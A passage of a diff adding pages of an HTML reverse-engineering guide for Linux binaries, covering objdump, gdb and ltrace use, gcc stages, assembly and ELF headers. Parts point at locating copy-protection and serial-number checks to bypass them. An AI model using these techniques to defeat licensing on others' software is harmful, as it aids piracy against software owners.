ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>The Linux Compilation Process</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

368
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x125.htm Normal file
View File

@@ -0,0 +1,368 @@
<HTML
><HEAD
><TITLE
>Determining Interesting Functions</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Determining Program Behavior"
HREF="x79.htm"/><LINK
REL="NEXT"
TITLE="Understanding Assembly"
HREF="x177.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x79.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x177.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN125"/>5. Determining Interesting Functions</H1
><P
>&#13; Clearly without source code, we can't possibly hope to understand all
of sections of an entire program. So we have to use various methods and
guess work to narrow down our search to a couple of key functions.
</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN128"/>5.1. Reconstructing function &amp; control information</H2
><P
>&#13; The problem is that first, we must determine what portions of the code
are actually functions. This can be difficult without debugging dymbols.
Fortunately, there are a couple of utilities that make our lives easier.
</P
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN131"/>5.1.1. objdump</H3
><P
>Objdump's most useful purpose is to disassemble a program with the -d
switch. Lacking symbols, this output is a bit more cryptic. The -j option
is used to specify a segment to disassemble. Most likely we will want
.text, which is where all the program code lies.
</P
><P
>Note that the leftmost column of objdump contains a hex number. This
is in fact the actual address in memory where that
instruction is located. Its binary value is given in the next column, followed by
its mnemonic.
</P
><P
>objdump -T will give us a listing of all library functions this program
calls.
</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN136"/>5.1.2. disasm.pl</H3
><P
>Steve Barker wrote a <A
HREF="code/disasm.pl.txt"
TARGET="_top"
> neat little
perl script </A
> that makes objdump much more legible in the
event that symbols are not included. The script has since been extended and
improved by myself and Nasko Oskov. It now makes 3 passes through the output.
The first pass builds a symbol table of called and jumped-to locations.
The second pass finds areas between two rets, and inserts them into the symbol
table as "unused" functions. The third pass prints out the nicely labeled
output, and prints out a function call tree. Usage:
</P
><PRE
CLASS="synopsis"
>./disasm /path/to/binary &gt; binary.asminfo</PRE
><P
>There are/will be few command line options to the utility. Now
--graph is supported. It will generate a file called call_graph that
contains defitinition that can be used with a program called <A
HREF="http://www.research.att.com/sw/tools/graphviz/"
TARGET="_top"
>dot</A
> to
generate visual representation of the call graph.
</P
><P
>Note: Unused functions just mean that that function wasn't called
DIRECTLY. It is still possible that a function was called through a
function pointer (ie, main is called this way)
</P
></DIV
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN144"/>5.2. Consider the objective</H2
><P
>&#13; Ok, so now we're getting ready to get really down and dirty. The first
step to finding what you are looking for is to know what you are
looking for. Which functions are 'interesting' is entirely dependent on your point
of view. Are you looking for copy protection? How do you suspect it is
done. When in the program execution does it show up? Are you looking
to do a security audit of the program? Is there any sloppy string usage?
Which functions use strcmp, sprintf, etc? Which use malloc? Is there a
possibility of improper memory allocation?
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN147"/>5.3. Finding key functions</H2
><P
>&#13; If we can narrow down our search to just a few functions that are
relevant to our objective, our lives should be much easier.
</P
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN150"/>5.3.1. Finding main()</H3
><P
>&#13; Regardless of our objective, it is almost always helpful to know where
main() lies. Unforuntely, when debugging symbols are removed, this is
not always easy.
</P
><P
>&#13; In Linux, program execution actually begins at the location defined by
the _start symbol, which is provided by gcc in the crt0 libraries (check
gcc -v for location). Execution then continues to __libc_start_main(),
which calls _init() for each library in the program space. Each _init() then
calls any global constructors you may
have in that particular library. Global constructors can be created by
making global instances of C++
classes with a constructor, or by specifying
__attribute__((constructor)) after a function prototype. After this,
execution is finally transferred to main.
</P
><P
>&#13; The easiest technique is to try to use our friends ltrace and gdb
together with our disassembled output. Checking the return address of
the first few functions of ltrace -i, and cross refrencing that to our
assembly output and function call tree should give us a pretty good idea
where main is. We may have to try to trick the program into exiting
early, or printout out an error message before it gets too deep into its
call stack.
</P
><P
>&#13; Other techniques exist. For example, we can LD_PRELOAD a <A
HREF="code/constructor.c"
TARGET="_top"
> .c file </A
> with a
constructor function in it. We can then set a breakpoint to a libc
function that it calls that is also in the main executable, and
<TT
CLASS="function"
>finish</TT
> and <TT
CLASS="function"
>stepi</TT
>
until we are satisfied that we have found main.
</P
><P
>&#13; Even better, we could just set a breakpoint in the function
__libc_start_main (which is a libc function, and thus we will always
have a symbol for it), and do the same technique of finishing and
stepiing until we reach what looks like main to us.
</P
><P
>&#13; At worst, even without a frame pointer, we should be able to get the
address of a function early enough in the execution chain for us to
consider it to be main.
</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN161"/>5.3.2. Finding other interesting functions</H3
><P
>&#13; Its probably a good idea to make a list of all functions that call exit.
These may be of use to us.
Other techniques for tracking down interesting functions include:
<P
></P
><OL
TYPE="1"
><LI
><P
>Checking for which functions call obscure gui construction
widgets used in a dialog box asking for a product serial number
</P
></LI
><LI
><P
> Checking the string references to find out which
functions reference strings that we are interested in. For
example, if a program outputs the text "Already registered."
knowing what function outputs this string is helpful in figuring
out the protection this particular program uses.
</P
></LI
><LI
><P
>Running a program in gdb, then hitting control C when it begins
to perform some interesting operation. using stepi N should slow things
down and allow you to be more accurate. Sometimes this is too slow
however. Find a commonly called function, set a breakpoint, and try
doing cont N.</P
></LI
><LI
><P
>&#13; Checking which functions call functions in the BSD socket layer
</P
></LI
></OL
>
</P
></DIV
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN173"/>5.4. Plotting out program flow</H2
><P
>&#13; Plot out execution paths into a tree from main, especially to your
function(s) of interest. You can use disasm.pl to generate call graphs
with the --graph option. Using it enables the script to generate file
called call_graph. It contains definition of the call graph in a
format used by a popular graphing tool called dot. Feeding this
definition file in dot will give you a nice (probably pretty huge)
graphics file with visual representation of the call graph. It is
pretty amazing. Definitely try it with some small program.
</P
><P
>&#13; Further analysis will have to hold off until we understand some assembly.
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x79.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x177.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Determining Program Behavior</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Understanding Assembly</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

1313
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x177.htm Normal file
View File

File diff suppressed because it is too large Load Diff

234
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x24.htm Normal file
View File

@@ -0,0 +1,234 @@
<HTML
><HEAD
><TITLE
>The Linux Compilation Process</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
HREF="t1.htm"/><LINK
REL="NEXT"
TITLE="Gathering Info"
HREF="x47.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="t1.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x47.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN24"/>2. The Linux Compilation Process</H1
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN26"/>2.1. Intro</H2
><P
>&#13; Compilation in general is split into roughly 5 stages: Preprocessing,
Parsing, Translation, Assembling, and Linking. All 5 stages are
implemented by one program in UNIX, namely cc, or in our case, gcc.
The general order of things goes gcc -&gt; gcc -E -&gt; gcc -S -&gt; as -&gt; ld.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN29"/>2.2. gcc</H2
><P
>&#13; gcc is the C compiler of choice for most UNIX. The program gcc itself is
actually just a front end that executes various other programs
corresponding to each stage in the compilation process. To get it to
print out the commands it executes at each step, use gcc -v.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN32"/>2.3. gcc -E (Preprocessor Stage)</H2
><P
>&#13; gcc -E runs only the preprocessor stage. This places all include files
into your .c file, and also translates all macros into inline C code.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN35"/>2.4. gcc -S (Parsing+Translation Stages)</H2
><P
>&#13; gcc -S will take .c files as input and output .s assembly files in
AT&amp;T syntax.
</P
><P
>&#13; gcc can be called with various optimization options that can do
interesting things to the outputted assembly code. There are between 4
and 7 general optimization classes that can be specified with a -ON,
where 0 &lt;= N &lt;= 6. 0 is no optimization (default), and 6 is maximum.
</P
><P
>&#13; There are also several fine-grained assembly options that are specified
with the -f flag. The most interesting are -funroll-loops,
-finline-functions, and -fomit-frame-pointer. Loop unrolling means to
expand a loop out so that there are n copies of the code for n
iterations of the loop (ie no jmp statements to the top of the loop).
On modern
processors, this optimization is negligible. Inlining functions means to
effectively convert all functions in a file to macros, and place copies
of their code directly in line in the calling function (like the
C++ inline keyword). This only applies for functions called in the same
C file as their definition. It is also a relatively small optimization.
Omitting the frame pointer (aka the base pointer) frees up an extra register for use in your
program. If you have more than 4 heavily used local variables, this may
be rather large advantage, otherwise it is just a nuisance (and makes
debugging much more difficult).
</P
><P
>&#13; Since some of these get turned on by default in the higher optimization
classes, it is useful to know that despite the fact that the manual page
does not mention it explicitly, all of the -f options have -fno
equivalents. So -fnoinline-functions prevents function inlining,
regardless of the -O option. (I think it happens at -O3 by default).
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN41"/>2.5. as (Assembly Stage)</H2
><P
>&#13; as is the GNU assembler. It takes input as AT&amp;T syntax asm files and
generates a .o object file.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN44"/>2.6. ld/collect2 (Linking Stage)</H2
><P
>&#13; ld is the GNU linker. It will generate a valid executable file. If you
link against shared libraries, you will want to actually use what gcc
calls, which is collect2. Watch gcc -v for flags
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x47.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Gathering Info</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

209
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x407.htm Normal file
View File

@@ -0,0 +1,209 @@
<HTML
><HEAD
><TITLE
>Writing Standalone Assembly</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Understanding Assembly"
HREF="x177.htm"/><LINK
REL="NEXT"
TITLE="Working with the ELF Program Format"
HREF="x430.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x177.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x430.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN407"/>7. Writing Standalone Assembly</H1
><P
>TODO: Eventually write our own tutorial. These are
incomplete.</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN410"/>7.1. Instructions with side-effects</H2
><P
>This is one of the more difficult parts about learning intel
assembly. TODO: Mention ret, leave, call, push, absence of pop in gcc
code, test.</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN413"/>7.2. Opcode Tables</H2
><P
>So in order to write assembly, we have to know the instructions
available. <A
HREF="http://pages.cpsc.ucalgary.ca/~dsb/Intel.html"
TARGET="_top"
>&#13; This table</A
> provides a list of the most common integer assembly
functions. Another table can be found <A
HREF="http://www.jegerlehner.ch/intel/opcode.html"
TARGET="_top"
>&#13; here</A
>. It contains more instructions, but less description of
operand types. Be mindful that both of these tables are in NASM syntax,
where as GNU AS uses AT&amp;T syntax.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN418"/>7.3. Using GNU as</H2
><P
><A
HREF=" http://www.redhat.com/docs/manuals/gnupro/GNUPro-Toolkit-00r1/6_auxtools/a_Using_AS/as.html"
TARGET="_top"
>&#13; The GNU Assembler manual</A
> describes how to use GNU as to declare
symbols, variables, data, and use other features of as.</P
><P
>Also, we've already linked <A
HREF="http://linuxassembly.org/linasm.html"
TARGET="_top"
>this tutorial</A
> but decided to place it here
for completeness.</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN424"/>7.4. Conventions on saving registers</H2
><P
>&#13; </P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN427"/>7.5. Using Library Functions</H2
><P
>TODO: Writeme. (Use collect2 line from gcc -v)</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x177.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x430.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Understanding Assembly</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Working with the ELF Program Format</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

333
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x430.htm Normal file
View File

@@ -0,0 +1,333 @@
<HTML
><HEAD
><TITLE
>Working with the ELF Program Format</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Writing Standalone Assembly"
HREF="x407.htm"/><LINK
REL="NEXT"
TITLE="Understanding Copy Protection"
HREF="x467.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x407.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x467.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN430"/>8. Working with the ELF Program Format</H1
><P
>So at this point we now know how to write our programs on an extremely
low level, and thus produce an executable file that very closely matches
what we want. But the question is, how is our program code now actually
stored on disk?</P
><P
>Well, recall that when a program runs, we start at the _start function,
and move on from there to __libc_start_main, and eventually to main, which
is our code. So somehow the operating system is gathering together a whole
lot of code from various places, and loading it into memory and then
running it. How does it know what code goes where?</P
><P
>The answer on Linux and UNIX is the <A
HREF="http://www.skyfree.org/linux/references/ELF_Format.pdf"
TARGET="_top"
>&#13; ELF binary specification.</A
> ELF specifies a standard format for
mapping your code on disk to a complete executable image in
memory that consists of your code, a stack, a heap (for malloc), and all
the libraries you link against.</P
><P
>So lets provide an overview of the information needed for our purposes
here, and refer the user to the ELF spec to fill in the details if they
wish. We'll start from the beginning of a typical executable and work our
way down.</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN437"/>8.1. ELF Layout</H2
><P
>There are three header areas in an ELF file: The main ELF file header,
the program headers, and then the section headers. The program code lies
inbetween the program headers and the section headers.</P
><P
>TODO: Insert figure here to show a typical ELF layout.</P
><P
>NOTE: ELF is extremely flexible. Many of these sections can be shunk,
expanded, removed, etc. In fact, it is not outside the realm of
possibility that some programs may deliberately make abnormal, yet valid
ELF headers and files to try to make reverse engineering difficult
(vmware does this, for example).</P
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN442"/>8.1.1. The Main ELF File Header</H3
><P
>The main elf header basically tells us where everything is located in
the file. It comes at the very beginning of the executable, and can be
read directly from the first e_ehsize (default: 52) bytes of the file
into this structure.</P
><PRE
CLASS="screen"
>&#13;/* ELF File Header */
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
} Elf32_Ehdr;
</PRE
><P
>&#13; The fields of interest to us are e_entry, e_phoff, e_shoff, and the
sizes given. e_entry specifies the location of _start, e_phoff shows us
where the array of program headers lies in relation to the start of the
executable, and e_shoff shows us the same
for the section headers.</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN447"/>8.1.2. The Program Headers</H3
><P
>&#13; The next portion of the program are the ELF program headers. These
describe the sections of the program that contain executable program
code to get mapped into the program address space as it loads.</P
><PRE
CLASS="screen"
>&#13;/* Program segment header. */
typedef struct
{
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
} Elf32_Phdr;
</PRE
><P
>Keep in mind that there are going to a few of these (usually 2)
end-to-end (ie forming an array of structs) in a typical ELF executable.
The interesting fields in this structure are
p_offset, p_filesz, and p_memsz, all of which we will need to make use of in the
code modification chapter.</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN452"/>8.1.3. The ELF Body</H3
><P
>The meat of the ELF file comes next. The actual locations and sizes
of portions of the body are described by the
program headers above, and contain the executable instructions from our
assembly file, as well as string constants and global variable
declairations. This will become important in the next chapter, program
modification. (TODO: How to link to other chapters)</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN455"/>8.1.4. ELF Section Headers</H3
><P
>&#13; The ELF section headers describe various named sections in an executable
file. Each section has an entry in the section headers array, which is
found at the bottom of the executable and has the following
format:</P
><PRE
CLASS="screen"
>&#13;/* Section header. */
typedef struct
{
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
} Elf32_Shdr;
</PRE
><P
>The section headers are entirely optional, however. A list of
common sections can be found on page 20 of the <A
HREF="http://www.skyfree.org/linux/references/ELF_Format.pdf"
TARGET="_top"
>ELF Spec
PDF</A
></P
></DIV
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN461"/>8.2. Editing ELF</H2
><P
>Editing ELF is often desired during reverse engineering, especially
when we want to insert bodies of code, or if we want to reverse engineer
binaries with deliberately corrupted ELF headers.</P
><P
>Now you could edit these headers by hand using the &lt;elf.h&gt; header
file and those above structures, but luckily there is already a nice
editor called <A
HREF="http://hte.sourceforge.net/"
TARGET="_top"
> HT Editor</A
>
that allows you to examine and modify
all sections of an ELF program, from ELF header to actual
instructions.
(TODO: instructions, screenshots of HTE)
</P
><P
>Do note that changing the size of various program sections in the ELF
headers will most likely break things. We will get into how to edit ELF
in more detail when we are talking about actual code insertion, which is
the next chapter.</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x407.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x467.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Writing Standalone Assembly</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Understanding Copy Protection</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

143
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x467.htm Normal file
View File

@@ -0,0 +1,143 @@
<HTML
><HEAD
><TITLE
>Understanding Copy Protection</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Working with the ELF Program Format"
HREF="x430.htm"/><LINK
REL="NEXT"
TITLE="Code Modification"
HREF="x470.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x430.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x470.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN467"/>9. Understanding Copy Protection</H1
><P
>&#13; TODO: Not sure where to put this (perhaps in the intro? Different goals of
reverse engineering? or perhaps as a part of the next section?) In any
case, it should describe common methods to copy protection, and how it
basically boils down to a conditional check in your program (with possible
a little decryption). Basically it comes down to chosing betwen presenting
techniques and then discussing how to use therm, or first discussing how we can
us the techniques we are about to discuss.. Which is better?
</P
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x430.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x470.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Working with the ELF Program Format</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Code Modification</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

388
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x47.htm Normal file
View File

@@ -0,0 +1,388 @@
<HTML
><HEAD
><TITLE
>Gathering Info</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="The Linux Compilation Process"
HREF="x24.htm"/><LINK
REL="NEXT"
TITLE="Determining Program Behavior"
HREF="x79.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x24.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x79.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
